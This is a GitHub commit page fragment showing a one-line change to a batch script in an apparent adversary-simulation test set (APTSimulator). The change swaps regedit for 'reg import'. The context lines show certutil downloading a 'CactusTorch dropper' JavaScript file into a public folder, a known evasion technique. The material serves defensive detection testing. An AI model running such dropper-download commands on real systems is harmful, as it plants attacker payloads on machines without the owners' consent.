We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 629a2ef commit efb972eCopy full SHA for efb972e
1 file changed
test-sets/defense-evasion/js-dropper.bat
@@ -7,7 +7,7 @@ ping -n 5 127.0.0.1 > NUL
7
8
ECHO Fixing possible problems with JavaScript on the system
9
"%ZIP%" e -p%PASS% "%FILEARCH%" -aoa -o"%TEMP%" workfiles\jsfix.reg > NUL
10
-regedit.exe /s "%TEMP%\jsfix.reg"
+reg import /s "%TEMP%\jsfix.reg"
11
12
ECHO Downloading the CactusTorch dropper (press Enter if it takes more than 20s)
13
cmd.exe /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/NextronSystems/APTSimulator/master/download/cactus.js C:\Users\Public\en-US.js
0 commit comments